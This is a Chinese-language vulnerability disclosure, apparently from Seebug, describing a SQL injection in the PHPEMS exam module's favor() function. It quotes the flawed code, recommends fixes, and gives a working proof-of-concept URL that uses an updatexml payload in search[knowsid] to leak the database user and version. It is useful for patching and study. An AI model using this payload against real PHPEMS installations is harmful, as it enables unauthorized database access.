### 简要描述: PHPEMS一处SQL注入漏洞 ### 详细说明: 5.phpems某处SQL注入漏洞 存在注入漏洞代码位于/app/exam/app.php的函数favor()中 具体在 default: $page = $this->ev->get('page'); $type = $this->ev->get('type'); $search = $this->ev->get('search'); $tmp = $this->section->getKnowsListByArgs(array("knowssectionid = '{$search['sectionid']}'","knowsstatus = 1")); if($search['sectionid'] && !$search['knowsid']) { $search['knowsid'] = ''; if(is_array($tmp)) { foreach($tmp as $p) $search['knowsid'] .= $p['knowsid'].","; } } $search['knowsid'] = trim($search['knowsid']," ,"); $page = $page > 0?$page:1; $args = array("favorsubjectid = '{$this->data['currentbasic']['basicsubjectid']}'","favoruserid = '{$this->_user['sessionuserid']}'"); if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";// SQL注入漏洞 if($type) { if($search['questype'])$args[] = "questionrows.qrtype = '{$search['questype']}'"; $favors = $this->favor->getFavorListByUserid($page,20,$args,1); } 这几行上 if($search['knowsid'])$args[] =...
### 简要描述: PHPEMS一处SQL注入漏洞
### 详细说明: 5.phpems某处SQL注入漏洞 存在注入漏洞的代码位于 /app/exam/app.php 的函数 favor() 中,具体在以下几行: default: $page = $this->ev->get('page'); $type = $this->ev->get('type'); $search = $this->ev->get('search'); $tmp = $this->section->getKnowsListByArgs(array("knowssectionid = '{$search['sectionid']}'","knowsstatus = 1")); if($search['sectionid'] && !$search['knowsid']) { $search['knowsid'] = ''; if(is_array($tmp)) { foreach($tmp as $p) $search['knowsid'] .= $p['knowsid'].","; } } $search['knowsid'] = trim($search['knowsid']," ,"); $page = $page > 0?$page:1; $args = array("favorsubjectid = '{$this->data['currentbasic']['basicsubjectid']}'","favoruserid = '{$this->_user['sessionuserid']}'"); if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";// SQL注入漏洞
if($type) { if($search['questype'])$args[] = "questionrows.qrtype = '{$search['questype']}'"; $favors = $this->favor->getFavorListByUserid($page,20,$args,1); } 其中 if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})"; 这一行的 $search['knowsid'] 来自 URL 参数($search = $this->ev->get('search');),拼接进 SQL 语句时未做任何过滤或参数化;而且该值位于 IN (...) 内、不带引号,因此即使框架对引号做了转义也无法阻止注入,从而导致 SQL 注入。同一段代码中 $search['sectionid'] 与 $search['questype'] 也以相同方式拼接进 SQL(有单引号包裹,是否可利用取决于 $this->ev->get() 是否转义引号,本文未给出),修复时应一并处理:对 knowsid 列表按整数做白名单校验(例如逐项 intval 后再 implode),或改用参数化查询。 验证: 注册一个用户并登录,然后访问链接 localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1) [<img src="https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png) 验证无误
### 漏洞证明: 注册一个用户并登录,然后访问链接 localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1) [<img src="https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png) 验证无误